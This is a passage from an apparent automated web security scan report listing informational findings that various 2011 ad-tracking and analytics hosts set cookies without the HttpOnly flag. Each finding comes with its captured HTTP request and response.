Set-Cookie: rsi_us_1000000="pUMdJE2jMAYU1Q2ENhuq3vIHtebrqMSpxsBz2o206rx7XdHqk2MHqYoAOld9rYtu+8u94QGhvrJf//mchCGk4X4xYR9YkhtFwZ+EHmvWXwanym+SKowdMgpK+G3TxpdT0+UgCZvwumkbf9vr4fQdGiwg6WnLAVuwjfo+LLfarQ046Iln78U+3J6ljUNMRuOkdO9Mnnyv8Ph4raozCmp2JrF/M/a1XxqZbKwuxtKGBsXCeINuvT1Dwg0YZ75iZNBoLOjf8W13Zl4CJC36Z4XiPuYYx7VVLswcQ1f1IUpRi0tVP1zSjeXFcN+1/w1gmA6W6CqbcuheULZAHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbLvbNT3fMCvtaDXIyrPwkoF8w6lNfTOtYtQFAz/IV4IPJWrD4KNtBKX22t0hxAm0v8J+kyCJ5ZzeQHic0omqoQI7nLtu10sFOz45YNec6XtAETkLs4MrS7FQ3IH3RPl9RghFVFL7AEBmZE6MLJb8R6Ojt6pNENLP0GFYiwm4TFb2SKn/BmuPGX+RQ53Pf3GEKvM6HCcOInSycBShfBaMhcAq/KXvUNyqcAH2V8YfjH3lKrXOpuTKlHgZTGmttlgL0VyX7DTMGfmjw5nw6zHe7h8/H5H1l0favdnkJI76/bA6W84/9aDU/Cl809vV+3f2eyldWLQwoKFaZn+cIoqtfx2xIyakfHxpK8WAJkNdJ/VnFZyKF2DzG99kicoZ19MRVVbFwfqwTyhIimN8HHGPaSdQqgrwOHKiGXAhVX7/9fojrdQmDpupJa/BnCDIM7bCV0xp2fXSEZFMoYFwJ/qKWGcdsTyzJzWgNNbMS4vq0nzsOFGgWuDDtcNdhnLcctVF7u9hBNQrtjPyNsYMBUdSYwUDEeR6PfA3KWx0Po7RAH1AiSzp4GWpRWkyFeQ2C1zx0IhQBeU/EMbnxLCIswaO/RDRMb7kEpKawwdPrfxayZYVWUqsn2gWHlnEx77G9qbp8u1ERAyiijHe7S3pCw34KPEgWMPlsbqqkw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:16:55 GMT


18.199. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_08a3="MLsXr98vcS5joAD3cWnZbLvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+wVZvXtwppxsRjnJOn0JoHY7lXcFYbXvZnisO8Kbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR20eaiqkaJwhTlwH++6Z4X48stfLiOo0Zv7eZb+2clznY/XzKBno82ZgospsTFZgqAkc+h9+RA1aOek/YZTiBPWcG8lxtS0MQbQ1AxRVuZ5/Dmeu4ZtqBBkQVG6QqB6fzKO50TmI/N5dJnTC6m0qVVRRn9lA5ZLkLkTMtQersUCMxy1hxMqLYBUYmEVrbUD55ScTBefUUF0U4kL87UEW98MK7iC9gTmt3xw0L/2hRO9SwVqZNP65sCLrj40ceeKvQ/DkXPEe2IlDjeemAsvvBr1HmQXiTUz873vQ96+E="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHteb7JxbCW7w++Pj1nwUVKp5hF8UbcYsAOiWvx6cDR9HtHH40iVodTNtchSGk4X4xYR9YkhtFwZ+EHmvnSD6nym9a9EOO6FFfbKJMGot66KlgRINQareOVIA47DpDddVt41B/2lZDvlXfqypOFT8raL2+bRtNAthCPn7y62D/SpWdGxcRNgDmIj5Yi0euDif+TNGrkMusQsihmYwbmkPKGIOXvT2jwg0YZ1hhZNBoLPjfce10Zl4C3C37YYXivucYx7VVLswcQ1f1IUJRi09VP17SjeVF9/S1bz8Xog5r6JCmXM3DqOcky83D+OCzMYAFF/KlMDverAlYjk3oFt8ANMxorn1kr7DMwpy2Aw2KoPrC+TNTrdLp2/Bqfp+lC4BJQxCqT4KNlBIX2Gx8mABa0jwzO6uB73qS6cvf+3DUlwo8DAqmGo0RMDG6xbe8C+6rPaoDdfzmFCzhQnIHYZVVX9xIQL6NBtXBNNNV8vTyDR2Phl6pMIFrP0W9Ylw25QHb2CKn/BmuPGH+XfI2Pf1Gk6sLkQVKH69IMHIe41VF9WwQvvI/fl9KqcAH2V/YfzHzjJwy8w6C91pBJA5QgXszDumhol06Ym+pxvfckQLm5gctQ7KNka5eEeJvkJI7l2OAeog7kVKMU/S18/mlz9++9bxcBU5bxCzMszMlTyGA9lloJyXweA7ZMvmT99T7RSL/0Nxqnv708289oi8q//gAGnD9DCHZbnRssHjCerFLPaQdwqkBrgXbE61vt/a5QB4KKIKaXQCZFqY3nSh42s3bCVNxp+e3aEYkLgYFwG/tyH58b1816hFChMWzSO8jd0GzSOHGjkcPV/zGQXuqqJMtWozTmjQ2ukCSXf0aZ2mu3OTC04OZgOoOQt2UIjUKH5zWWG5ekz+hDMNgjVap5KdmOT3CwZjpI4zA90B1CATPC3swcaxfRCZvFIWda8pXY/95WMEdqajOSPgqXotJ1P/x8kgIOQfpJr6aSQznonK1NHQINiZqOUh8xIVemA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_08a3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_08a3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bhJ0="MLsXr98vcS5joAD3cWkfYUw1tIebrb2QmbdXm6j+DYZlI1D1a3Tl+WEpJX+o5AVFSd5d5ssFR9oWxtfs6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh29ZpvVrzvqSf6Tn907bJXIJ1bTRUD/N6XW+2mPaBgdy6Qo3KELseVAWAaq6P4wa46LVQp5vnrosH/Ng/dv/wp5HopVk2YhKyoWWlOUwXUI/XHrIj+eEFssu8rch61LPNWZn4aSkmVd2dXhtTy5snFiLuAWijaAQsUrJ9Z9ldVKplBpWWTQl5k//BWPZOof8fAdS04KgilPjACpIWXdG1+ZjyPTBw2JOksGDgcEossWHD46TEJ5UrDDMkV3gw5ykqcayotvrS10H59Uw7cU+yxz6zFB/a8SJJ2tZnqgX3Mw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1eFT5Ws9TLv2rR/V4c7P6C3v7mfvNoGRBqQ2Og72VXuRuum/D84TKAm1hb+FYI/dkvBZ/1510tuxXK81B4UDnngZ3Vlpgc/842Hfph7v58LNOUDQBghPJxmyBGxmmaPBTx77r/TfmIuoaAsgkkUm+Tsn1FF/6JUGd2pstXb4+t7GXFWrETtzjW87/ZK7UTsj5tzg28aqkkKW/fTYctG84K1DtatLGCwqPEsjI3/q33h7IcW8LCELnnUfaxwqmqKj3js37OEJH5EumfAisx5oE6dY3mzYaqgOAvr6G3H0VT8gQA8oaXw+iPHX2eAodHHdoaYpmT+ERLJsiANnM9Z5EFziSdC96wk7umpr95g5/jD54Hs/LzOCodFzmpHBxKTsji29M8aTaIGiqScgNvaAi6AopEUA0OUlHeXoRltrWXiapyxnvtWw0LCQVdJhSuOlTrDEN1SPrzEglIL+b92MoEdPoIfcJF/ThTCBT9xdQxi9EGsv5fR81xMW5gxAyZHZNDJHc7Ok0gLAHIl6tlAmlj44s1XVLfSb/lGmPMI8cWIjirT9v0KvN3m3EAY62T5Ybin1k+oSDHFd48PwZdo4AIxW2yiYKiriwPgI/vnDwea4BL4iinSWMGEInCp4XYtENicIV5fGaUyxhPMSTwJXdcDan+hzsJJioXllzVMPvqLRzmlP4hKMtpJECwcangXrx4sz6lpG9jGu1DsOkY7fkXKp5I8JvUVSOk9AOv9lmhe/rI7EfHtZ5GnbQCYmSiLXcdeAn3jj+SCrwuS5X+BtayaVBLrK3F9t+lkRD+3mwags4jAqgxZvcmQEtB9vfhUqoXQ1mHNrIAkZ1fn2TCAcr/t7gcjh6Sh5JA3ZCBnDsaM2MoM9gfH4lBccBqDhCgOm23sRVjyzG51dCP+KiXsOLcBOnQDAD5S4ZxSA0Up/1IIW2XXQq3Zg/PtRdY/j8qAgVT3K8QQ6Y0cukjvN4Bgxf7MtAbz8qAS6pZz5XJy9nV9L0MY8WyjLzjEZOn77piBCY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:04:08 GMT


18.200. http://adserver.veruta.com/track.fcgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /track.fcgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track.fcgi?ifmode=1&rand=1303691584172&merchantid=3742872422&eventid=0&search=reputation%20management%20%20%20online%20reputation%20management%20%20%20reputationmanagementconsultants%20com HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://www.reputationmanagementconsultants.com/?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 00:32:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Set-cookie: ueid=1528544390|1303691572|2|2; expires=Tue, 24-Apr-2012 00:32:52 GMT; path=/; domain=.veruta.com;
Set-cookie: cmid=; expires=Tue, 24-Apr-2012 00:32:52 GMT; path=/; domain=.veruta.com;
Content-Length: 65

<html><head><title></title></head><body><div></div></body></html>

18.201. http://adsfac.us/ag.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ag.asp?cc=DLK001.311878.0&source=js&ord=[timestamp] HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=336showcase;tile=2;sz=336x280;ord=02880823?;c=win7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 1041
Content-Type: text/javascript
Expires: Sun, 24 Apr 2011 19:48:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSDLK001311878=uid=8887205; expires=Mon, 25-Apr-2011 19:49:22 GMT; path=/
Set-Cookie: FSDLK001=pctl=311878&pctm=1&FL311878=1&fpt=0%2C311878%2C&pct%5Fdate=4131&FM34633=1&pctc=34633&FQ=1; expires=Tue, 24-May-2011 19:49:22 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sun, 24 Apr 2011 19:49:22 GMT
Connection: close

if (typeof(fd_clk)=='undefined'){var fd_clk = 'http://ADSFAC.US/link.asp?cc=DLK001.311878.0&CreativeID=34633';}if(fd_clk.toLowerCase().indexOf('&creativeid=')!=-1){}else{fd_clk += '&CreativeID=34633'}
...[SNIP]...

18.202. http://affiliate.idgtracker.com/rd/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=test; PHPSESSID=g7dpq2uc614mccbr73j7na1id6

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test; expires=Sun, 24-Apr-2011 03:08:50 GMT
Set-Cookie: track=track; expires=Sun, 24-Apr-2011 03:08:50 GMT
Set-Cookie: uid13=205557649-20110423230900-eebb54cfd8f3db802fb39a5eacf5be74-0; expires=Wed, 25-May-2011 02:29:00 GMT; path=/
Location: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


18.203. http://affiliate.idgtracker.com/rd/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rd/r.php?sid=58&pub=300009&c1=CD76&cenhp1=1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=test; uid13=205557649-20110423230900-eebb54cfd8f3db802fb39a5eacf5be74-0; uid14=205557652-20110423230924-eebb54cfd8f3db802fb39a5eacf5be74-0; PHPSESSID=umhkmt4p9mee285hv3ag4b29m7

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:09:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test; expires=Sun, 24-Apr-2011 20:09:07 GMT
Set-Cookie: track=track; expires=Sun, 24-Apr-2011 20:09:07 GMT
Set-Cookie: uid58=205561174-20110424160917-eebb54cfd8f3db802fb39a5eacf5be74-0; expires=Wed, 25-May-2011 19:29:17 GMT; path=/
Location: http://www.identityguard.com/ipages/le33/letp30daysfree33.html?mktp=Next&hid=205561174&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


18.204. http://affiliate.idgtracker.com/rd/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rd/r.php?sid=14&pub=300009&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=test; PHPSESSID=g7dpq2uc614mccbr73j7na1id6; uid13=205557649-20110423230900-eebb54cfd8f3db802fb39a5eacf5be74-0

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test; expires=Sun, 24-Apr-2011 03:09:14 GMT
Set-Cookie: track=track; expires=Sun, 24-Apr-2011 03:09:14 GMT
Set-Cookie: uid14=205557652-20110423230924-eebb54cfd8f3db802fb39a5eacf5be74-0; expires=Wed, 25-May-2011 02:29:24 GMT; path=/
Location: http://www.identityguard.com/gscc.aspx?mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


18.205. http://altfarm.mediaplex.com/ad/fm/14302-119028-29115-1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/14302-119028-29115-1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/fm/14302-119028-29115-1?mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Wed, 24-Apr-2013 4:32:52 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=&placementid=14302119028291151&
Content-Length: 0
Date: Sun, 24 Apr 2011 15:30:18 GMT


18.206. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /b/ss/flairviewhcprod/1/H.17/s84063693960197

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:09:49 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA098605162390-600001A0A001BFE4[CE]; Expires=Fri, 22 Apr 2016 12:09:48 GMT; Domain=.hotelclub.com; Path=/
Location: http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA098605162390-600001A0A001BFE4&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 12:09:48 GMT
Last-Modified: Mon, 25 Apr 2011 12:09:48 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www605
Content-Length: 0
Content-Type: text/plain


18.207. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303646989.757,wait-%3E10000,&1303646994271 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
